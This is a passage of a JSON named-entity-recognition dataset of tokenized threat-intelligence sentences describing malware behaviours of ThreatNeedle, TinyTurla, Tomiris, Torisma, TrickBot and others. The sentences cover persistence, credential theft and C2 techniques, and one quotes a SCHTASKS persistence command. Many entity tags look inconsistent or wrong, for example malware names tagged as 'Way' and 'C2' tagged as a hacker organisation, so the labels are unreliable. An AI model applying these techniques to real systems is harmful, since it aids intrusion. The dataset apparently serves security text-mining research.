"tokens": [ "ThiefQuest", "uploads", "files", "via", "unencrypted", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ThreatNeedle", "can", "collect", "data", "and", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ThreatNeedle", "can", "decrypt", "its", "payload", "using", "RC4,", "AES,", "or", "one-byte", "XORing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "ThreatNeedle", "has", "been", "compressed", "and", "obfuscated", "using", "RC4,", "AES,", "or", "XOR." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "ThreatNeedle", "can", "obtain", "file", "and", "directory", "information." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "ThreatNeedle", "can", "save", "its", "configuration", "data", "as", "a", "RC4-encrypted", "Registry", "key", "under", "`HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameCon`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ThreatNeedle", "can", "download", "additional", "tools", "to", "enable", "lateral", "movement." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ThreatNeedle", "relies", "on", "a", "victim", "to", "click", "on", "a", "malicious", "document", "for", "initial", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ThreatNeedle", "chooses", "its", "payload", "creation", "path", "from", "a", "randomly", "selected", "service", "name", "from", "netsvc." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ThreatNeedle", "can", "modify", "the", "Registry", "to", "save", "its", "configuration", "data", "as", "the", "following", "RC4-encrypted", "Registry", "key:", "`HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameCon`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "ThreatNeedle", "can", "be", "loaded", "into", "the", "Startup", "folder", "(`%APPDATA%\\Microsoft\\Windows\\Start", "Menu\\Programs\\Startup\\OneDrives.lnk`)", "as", "a", "Shortcut", "file", "for", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "ThreatNeedle", "has", "been", "distributed", "via", "a", "malicious", "Word", "document", "within", "a", "spearphishing", "email." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O", "O", "B-Way", "O" ] }, { "tokens": [ "ThreatNeedle", "can", "collect", "system", "profile", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ThreatNeedle", "can", "run", "in", "memory", "and", "register", "its", "payload", "as", "a", "Windows", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "has", "the", "ability", "to", "encrypt", "C2", "traffic", "with", "SSL/TLS." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "B-Way" ] }, { "tokens": [ "TinyTurla", "can", "upload", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "can", "go", "through", "a", "list", "of", "C2", "server", "IPs", "and", "will", "try", "to", "register", "with", "each", "until", "one", "responds." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "can", "save", "its", "configuration", "parameters", "in", "the", "Registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "has", "the", "ability", "to", "act", "as", "a", "second-stage", "dropper", "used", "to", "infect", "the", "system", "with", "additional", "malware." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "has", "mimicked", "an", "existing", "Windows", "service", "by", "being", "installed", "as", "<code>Windows", "Time", "Service</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "has", "been", "deployed", "as", "`w64time.dll`", "to", "appear", "legitimate." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "can", "set", "its", "configuration", "parameters", "in", "the", "Registry." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "has", "used", "`WinHTTP`,", "`CreateProcess`,", "and", "other", "APIs", "for", "C2", "communications", "and", "other", "functions." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "can", "query", "the", "Registry", "for", "its", "configuration", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "contacts", "its", "C2", "based", "on", "a", "scheduled", "timing", "set", "in", "its", "configuration." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "can", "install", "itself", "as", "a", "service", "on", "compromised", "machines." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "can", "use", "HTTPS", "in", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "TinyTurla", "has", "been", "installed", "using", "a", ".bat", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "TinyZBot", "contains", "functionality", "to", "collect", "information", "from", "the", "clipboard." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "TinyZBot", "can", "disable", "Avira", "anti-virus." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "TinyZBot", "contains", "keylogger", "functionality." ], "ner_tags": [ "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "TinyZBot", "can", "create", "a", "shortcut", "in", "the", "Windows", "startup", "folder", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TinyZBot", "contains", "screen", "capture", "functionality." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "TinyZBot", "can", "create", "a", "shortcut", "in", "the", "Windows", "startup", "folder", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TinyZBot", "supports", "execution", "from", "the", "command-line." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "TinyZBot", "can", "install", "as", "a", "Windows", "service", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tomiris", "has", "the", "ability", "to", "collect", "recent", "files", "matching", "a", "hardcoded", "list", "of", "extensions", "prior", "to", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tomiris", "has", "connected", "to", "a", "signalization", "server", "that", "provides", "a", "URL", "and", "port,", "and", "then", "Tomiris", "sends", "a", "GET", "request", "to", "that", "URL", "to", "establish", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tomiris", "can", "upload", "files", "matching", "a", "hardcoded", "set", "of", "extensions,", "such", "as", ".doc,", ".docx,", ".pdf,", "and", ".rar,", "to", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Tomiris", "can", "download", "files", "and", "execute", "them", "on", "a", "victim's", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tomiris", "has", "used", "`SCHTASKS", "/CREATE", "/SC", "DAILY", "/TN", "StartDVL", "/TR", "\"[path", "to", "self]\"", "/ST", "10:00`", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "B-Way", "B-Tool", "B-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tomiris", "has", "been", "packed", "with", "UPX." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Tomiris", "has", "the", "ability", "to", "sleep", "for", "at", "least", "nine", "minutes", "to", "evade", "sandbox-based", "analysis", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tomiris", "can", "use", "HTTP", "to", "establish", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Tor", "encapsulates", "traffic", "in", "multiple", "layers", "of", "encryption,", "using", "TLS", "by", "default." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Traffic", "traversing", "the", "Tor", "network", "will", "be", "forwarded", "to", "multiple", "nodes", "before", "exiting", "the", "Tor", "network", "and", "continuing", "on", "to", "its", "intended", "destination." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Torisma", "has", "used", "XOR", "and", "Base64", "to", "decode", "C2", "data." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Torisma", "has", "been", "Base64", "encoded", "and", "AES", "encrypted." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Torisma", "is", "only", "delivered", "to", "a", "compromised", "host", "if", "the", "victim's", "IP", "address", "is", "on", "an", "allow-list." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Torisma", "can", "send", "victim", "data", "to", "an", "actor-controlled", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Torisma", "has", "used", "various", "Windows", "API", "calls." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Torisma", "has", "been", "packed", "with", "Iz4", "compression." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Torisma", "has", "encoded", "C2", "communications", "with", "Base64." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Torisma", "has", "encrypted", "its", "C2", "communications", "using", "XOR", "and", "VEST-32." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Torisma", "can", "use", "`GetlogicalDrives`", "to", "get", "a", "bitmask", "of", "all", "drives", "available", "on", "a", "compromised", "system.", "It", "can", "also", "use", "`GetDriveType`", "to", "determine", "if", "a", "new", "drive", "is", "a", "CD-ROM", "drive." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Torisma", "can", "collect", "the", "local", "MAC", "address", "using", "`GetAdaptersInfo`", "as", "well", "as", "the", "system's", "IP", "address." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Torisma", "can", "use", "`WTSEnumerateSessionsW`", "to", "monitor", "remote", "desktop", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Torisma", "can", "collect", "the", "current", "time", "on", "a", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Torisma", "can", "use", "HTTP", "and", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "TrailBlazer", "can", "masquerade", "its", "C2", "traffic", "as", "legitimate", "Google", "Notifications", "HTTP", "requests." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrailBlazer", "has", "used", "random", "identifier", "strings", "to", "obscure", "its", "C2", "operations", "and", "result", "codes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrailBlazer", "has", "used", "filenames", "that", "match", "the", "name", "of", "the", "compromised", "system", "in", "attempt", "to", "avoid", "detection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrailBlazer", "has", "used", "HTTP", "requests", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrailBlazer", "has", "the", "ability", "to", "use", "WMI", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "TrickBot", "can", "implant", "malicious", "code", "into", "a", "compromised", "device's", "firmware." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "uses", "web", "injects", "and", "browser", "redirection", "to", "trick", "the", "user", "into", "providing", "their", "login", "credentials", "on", "a", "fake", "or", "modified", "web", "page." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "has", "come", "with", "a", "signed", "downloader", "component." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "used", "COM", "to", "setup", "scheduled", "task", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "has", "the", "ability", "to", "capture", "RDP", "credentials", "by", "capturing", "the", "<code>CredEnumerateA</code>", "API" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "uses", "brute-force", "attack", "against", "RDP", "with", "rdpscanDll", "module." ], "ner_tags": [ "B-Idus", "O", "B-Org", "B-OffAct", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "TrickBot", "can", "obtain", "passwords", "stored", "in", "files", "from", "several", "applications", "such", "as", "Outlook,", "Filezilla,", "OpenSSH,", "OpenVPN", "and", "WinSCP.", "Additionally,", "it", "searches", "for", "the", "\".vnc.lnk\"", "affix", "to", "steal", "VNC", "credentials." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Purp", "B-HackOrg", "B-Features" ] }, { "tokens": [ "TrickBot", "can", "obtain", "passwords", "stored", "in", "files", "from", "web", "browsers", "such", "as", "Chrome,", "Firefox,", "Internet", "Explorer,", "and", "Microsoft", "Edge,", "sometimes", "using", "esentutl." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "I-Tool", "O", "O", "I-Tool", "O", "O", "O", "B-Way" ] }, { "tokens": [ "TrickBot", "has", "retrieved", "PuTTY", "credentials", "by", "querying", "the", "<code>Software\\SimonTatham\\Putty\\Sessions</code>", "registry", "key" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "collects", "local", "files", "and", "information", "from", "the", "victim’s", "local", "machine." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "decodes", "the", "configuration", "data", "and", "modules." ], "ner_tags": [ "B-Way", "B-Features", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "TrickBot", "can", "disable", "Windows", "Defender." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "TrickBot", "can", "gather", "information", "about", "domain", "trusts", "by", "utilizing", "Nltest." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "TrickBot", "collects", "email", "addresses", "from", "Outlook." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "uses", "an", "AES", "CBC", "(256", "bits)", "encryption", "algorithm", "for", "its", "loader", "and", "configuration", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "TrickBot", "can", "send", "information", "about", "the", "compromised", "host", "and", "upload", "data", "to", "a", "hardcoded", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "utilizes", "EternalBlue", "and", "EternalRomance", "exploits", "for", "lateral", "movement", "in", "the", "modules", "wormwinDll,", "wormDll,", "mwormDll,", "nwormDll,", "tabDll." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "B-Features", "B-Exp", "O", "O", "O", "O", "O", "I-Tool", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way" ] }, { "tokens": [ "TrickBot", "has", "been", "known", "to", "reach", "a", "command", "and", "control", "server", "via", "one", "of", "nine", "proxy", "IP", "addresses." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "can", "use", "secondary", "C2", "servers", "for", "communication", "after", "establishing", "connectivity", "and", "relaying", "victim", "information", "to", "primary", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "searches", "the", "system", "for", "all", "of", "the", "following", "file", "extensions:", ".avi,", ".mov,", ".mkv,", ".mpeg,", ".mpeg4,", ".mp4,", ".mp3,", ".wav,", ".ogg,", ".jpeg,", ".jpg,", ".png,", ".bmp,", ".gif,", ".tiff,", ".ico,", ".xlsx,", "and", ".zip.", "It", "can", "also", "obtain", "browsing", "history,", "cookies,", "and", "plug-in", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "B-Features", "O", "O", "B-Features" ] }, { "tokens": [ "TrickBot", "module", "\"Trickboot\"", "can", "write", "or", "erase", "the", "UEFI/BIOS", "firmware", "of", "a", "compromised", "device." ], "ner_tags": [ "B-Way", "B-Tool", "B-Way", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "has", "used", "a", "hidden", "VNC", "(hVNC)", "window", "to", "monitor", "the", "victim", "and", "collect", "information", "stealthily." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "downloads", "several", "additional", "files", "and", "saves", "them", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "collects", "the", "users", "of", "the", "system." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "TrickBot", "has", "attempted", "to", "get", "users", "to", "launch", "malicious", "documents", "to", "deliver", "its", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "TrickBot", "downloader", "has", "used", "an", "icon", "to", "appear", "as", "a", "Microsoft", "Word", "document." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "TrickBot", "can", "modify", "registry", "entries." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "TrickBot", "uses", "the", "Windows", "API", "call,", "CreateProcessW(),", "to", "manage", "execution", "flow.", "TrickBot", "has", "also", "used", "<code>Nt*</code>", "API", "functions", "to", "perform", "Process", "Injection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "module", "shareDll/mshareDll", "discovers", "network", "shares", "via", "the", "WNetOpenEnumA", "API." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Some", "TrickBot", "samples", "have", "used", "HTTP", "over", "ports", "447", "and", "8082", "for", "C2.", "Newer", "versions", "of", "TrickBot", "have", "been", "known", "to", "use", "a", "custom", "communication", "protocol", "which", "sends", "the", "data", "unencrypted", "over", "port", "443." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "uses", "non-descriptive", "names", "to", "hide", "functionality." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "can", "steal", "passwords", "from", "the", "KeePass", "open", "source", "password", "manager." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "can", "identify", "the", "groups", "the", "user", "on", "a", "compromised", "host", "belongs", "to." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "has", "been", "known", "to", "use", "PowerShell", "to", "download", "new", "payloads,", "open", "documents,", "and", "upload", "data", "to", "command", "and", "control", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "I-Features", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "uses", "module", "networkDll", "for", "process", "list", "discovery." ], "ner_tags": [ "B-Way", "O", "I-Tool", "B-HackOrg", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "TrickBot", "injects", "into", "the", "svchost.exe", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "TrickBot", "has", "used", "<code>Nt*</code>", "Native", "API", "functions", "to", "inject", "code", "into", "legitimate", "processes", "such", "as", "<code>wermgr.exe</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "TrickBot", "establishes", "persistence", "in", "the", "Startup", "folder." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "uses", "vncDll", "module", "to", "remote", "control", "the", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "can", "enumerate", "computers", "and", "network", "devices." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "creates", "a", "scheduled", "task", "on", "the", "system", "that", "provides", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "leverages", "a", "custom", "packer", "to", "obfuscate", "its", "functionality." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "has", "used", "an", "email", "with", "an", "Excel", "sheet", "containing", "a", "malicious", "macro", "to", "deploy", "the", "malware" ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "has", "been", "delivered", "via", "malicious", "links", "in", "phishing", "e-mails." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "TrickBot", "can", "Base64-encode", "C2", "commands." ], "ner_tags": [ "B-Way", "O", "B-SamFile", "B-Features", "O" ] }, { "tokens": [ "TrickBot", "uses", "a", "custom", "crypter", "leveraging", "Microsoft’s", "CryptoAPI", "to", "encrypt", "C2", "traffic.Newer", "versions", "of", "TrickBot", "have", "been", "known", "to", "use", "`bcrypt`", "to", "encrypt", "and", "digitally", "sign", "responses", "to", "their", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "gathers", "the", "OS", "version,", "machine", "name,", "CPU", "type,", "amount", "of", "RAM", "available,", "and", "UEFI/BIOS", "firmware", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "obtains", "the", "IP", "address,", "location,", "and", "other", "relevant", "network", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "can", "identify", "the", "user", "and", "groups", "the", "user", "belongs", "to", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "collects", "a", "list", "of", "install", "programs", "and", "services", "on", "the", "system’s", "machine." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "has", "used", "<code>printf</code>", "and", "file", "I/O", "loops", "to", "delay", "process", "execution", "as", "part", "of", "API", "hammering." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TrickBot", "has", "used", "a", "VNC", "module", "to", "monitor", "the", "victim", "and", "collect", "information", "to", "pivot", "to", "valuable", "systems", "on", "the", "network" ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ 